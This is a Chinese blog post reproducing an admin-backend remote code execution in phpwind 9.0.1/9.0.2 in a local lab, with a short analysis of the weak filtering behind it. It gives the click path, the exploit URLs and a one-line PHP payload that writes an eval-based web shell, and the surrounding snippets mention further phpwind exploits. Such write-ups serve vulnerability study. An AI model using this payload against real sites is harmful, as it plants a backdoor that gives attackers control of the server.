漏洞复现:phpwind v 9.0.2后台getshell

最新推荐文章于 2024-08-26 08:58:52 发布
最新推荐文章于 2024-08-26 08:58:52 发布
阅读量3.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41631806/article/details/105271085
版权

漏洞复现:phpwind v 9.0.2后台getshell

一、概述
已知影响版本:v9.0.1,v9.0.2
复现版本:9.0.2
搭建环境:phpstudy2018
审计工具:Seay源代码审计系统

二、复现步骤:
1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况:
在这里插入图片描述2.打开install.php页面安装好phpwind后登陆后台。选择门户–>模块管理–>调用管理–>添加模块,新增模块–>选择自定义html–>下一步–>提交代码,模块管理–>调用管理–>调用代码。
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.复制任意站外调用代码url,例json,代码没有过滤:
http://192.168.0.123/phpwind9.0.2/index.php?m=design&c=api&token=qvIQqG3WL2&id=5&format=json
在这里插入图片描述4.去掉url中format参数值,代码被执行:
http://192.168.0.123/phpwind9.0.2/index.php?m=design&c=api&token=qvIQqG3WL2&id=5&format=
在这里插入图片描述
getshell代码:<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['pp']);?>");?>
菜鸟试着代码审计,原理后续。

三、代码浅析
漏洞代码入口:\src\applications\design\controller\ApiController.php
在这里插入图片描述
run():

getInput('format', 'get');

获取get参数

!$out && $out = 'script';
$method = $out.'Format';
return $this->$method($moduleId);

若format参数为空、0、false(这里false不行,不是bool类型),则执行scriptFormat()

scriptForm():
根据moduleId获取整个module对象——PwDesignModuleDao;
处理我们提交的代码内容(即phpinfo;)的关键代码见
\src\service\design\srv\PwDesignCompile.php
在这里插入图片描述

		$html = preg_replace("/\r\n|\n|\r/", '', $html);
		$html = preg_replace("/οnerrοr=\"(.+)\"/", '', $html);
		$html = "document.write('".$html."');";

只过滤了\n、\r、οnerrοr=""

小菜鸡还有很多代码没看懂,请大神们指教。弄懂补后续。

参考文章:
phpwind v9存在命令执行漏洞(登陆后台)

onlyoneya
关注
phpwind漏洞与修复方
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 523
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新版本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 931
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序,利用它建站的网站非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0版本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合版漏洞利用成功,可能是我机子中之前的版本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合版来给大家介绍phpw
phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台
weixin_30249953的博客
03-13 544
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465phpwind v9最新版存在命令执行漏洞(登陆后台)Phpwind_v9.0.2(最新版),phpwind_v9.0.1命令执行高危(getshell)phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活...
ssrf漏洞复现phpwind)
最新发布
adc8848nb的博客
08-26 610
phpwind默认全局命名空间为\,将类名设置为src\library\utility\PwDelayRun,并不能加载出PwDelayRun类。在反序列化的过程,第一个类调用autoLoad自动加载类函数中的include文件包含className执行语句,第二个类拿到PwDelayRun对象。类名中是可以包含\的,我们直接在className传递PwDelayRun类的路径src/library/utility/PwDelayRun.php,就可以加载PwDelayRun类。
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 994
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
PHPWind v9.0.2 正式版 UTF8 build20170426.zip
07-07
PHPWind社区程序是一套采用php mysql数据库方式运行并可生成html页面的全新且完善的强大系统。PHPWind 9.0 Beta版暂时只支持UTF8编码。我们希望作为一个开源的系统,phpwind可以以其流畅的速度与高负载能力激起各位加入phpwind阵营的热情,并共同打造Nextwind! PHPWind v9.0.2 正式版 UTF8 build20170426更新日志 1、打包了2017年4月1日之前所有安全补丁 2、内置了阿里云滑动插件,免费免注册阿里云账号 PHPWind特点 轻社区/新社区 1、采用新一代的社区交互界面让网民在各个应用模块(论坛、门户、个人空间)之间的切换更加平滑 2、重新整理社区的各种互动功能(板块收藏、喜欢、标签)提升社区的用户黏度 3、全新、多变的产品形态更和更低的运营成本 轻社区/新社区 1、采用新一代的社区交互界面让网民在各个应用模块(论坛、门户、个人空间)之间的切换更加平滑 2、重新整理社区的各种互动功能(板块收藏、喜欢、标签)提升社区的用户黏度 3、全新、多变的产品形态更和更低的运营成本 易开发 1、站长和应用开发者将以更低的成本实现自己的产品意图 2、更多的api接口和预埋hooks让您的奇思妙想能在新一代社区落地 3、灵活多变的模板方案让“个性”如此简单   PHPWind截图   相关阅读 同类推荐:论坛系统
【3】phpwind v9.0.2 后台getshell
司徒荆的博客
06-05 1408
phpwind v9.0.2 后台getshell,进入后台后才可以
PHPWind v9.0.2 正式版 UTF8 build20170426
11-30
PHPWind v9.0.2 正式版 UTF8 build20170426】是一款基于PHP编程语言和MySQL数据库的开源社区软件,它代表了PHPWind团队多年的技术积累与创新。这款社区软件的发布,标志着PHPWind在社区建站领域的又一次重大升级,...
shadowcore:影子世界9.0.2
04-03
"Shadowcore: 影子世界9.0.2" 是一个软件项目或库的更新版本,专注于提供某种特定的功能或服务。"影芯"可能是这个项目的核心组件,它可能是一个关键的中间件或者框架,为其他应用或系统提供底层支持。在IT行业中,...
phpwind_v9.0.2_utf8.zip
05-31
phpwind v9.0.2 UTF8 安装指南】 `phpwind` 是一个流行的开源社区论坛系统,主要用于构建大型、高并发的在线社区。`phpwind v9.0.2` 是该系统的其中一个稳定版本,支持 `UTF8` 编码,能够满足多语言环境的需求。...
用友漏洞php,Phpwind GET型CSRF任意代码执行漏洞公开
weixin_36285392的博客
03-29 510
这个洞其实很有意思,最可惜的地方就是其触发位置在后台,否则它将是一个绝无仅有的好洞。0x01 后台反序列化位置首先纵览整个phpwindv9,反序列化的位置很多,但基本都是从数据库里取出的,很难完全控制序列化字符串。
最后,找到三处:可恶的是,三处都在后台的Task模块下。Task模块是『任务中心』功能,只有能进入后台的用户才可以访问:随便打开一个, src/applications/task/a...
phpwind-v9.0.2
04-04
phpwind9.0.2版本,搭配XAMPP使用,亲自试用过,可放心使用。
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
phpwind9.x和8.7XSS注入以及管理后台脚本注入漏洞
10-18 1428
漏洞描述: phpwind近期公布了2处安全漏洞,分别是富文本编辑器发帖的xss注入(受影响版本8.7、9.X)以及管理后台添加新用户时的脚本注入(受影响版本8.7)。 影响版本: phpwind 9.x以及8.7,8.7.1 漏洞等级: 高危 修复建议: 1、安装官方最新补丁,官方补丁:http://www.phpwind.net/read/3709782 2、添加网站至云观测,及时了解网站组...
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_30703633的博客
03-22 493
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码
PHPWind v7.5 / v8.0漏洞EXP
收集盒 Book box
08-29 2967
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5 影响版本:PHPWind v7.5 / v8.0 命令 :php pking.php user passhttp://www.xxxx.com/ pking.php:复制内容到剪贴板程序代码
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 851
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
phpwind暴出跨站漏洞,小漏洞,大危害
网络——菜市场
10-19 2644
 phpwind暴出跨站漏洞,小漏洞,大危害来源:华夏黑客联盟(www.hxhack.com)前言:大家都应该知道,国内主流论坛程序主要有两大家,一种是phpwind论坛程序,一种是dz论坛程序;不知道的,百度搜索一下便知道了。我也是无意间发现这个漏洞的,如果有人恶意利用以下的方法,谁又会想到phpwind官方网站竟然会被人通过这样的方法挂马?小漏洞存在的危害并不小!所以提醒广大的网民一定要警惕网
PHP又有重大漏洞,PHPWind重大漏洞 大量论坛被夺管理权
weixin_34135138的博客
04-02 501
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、BTCHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值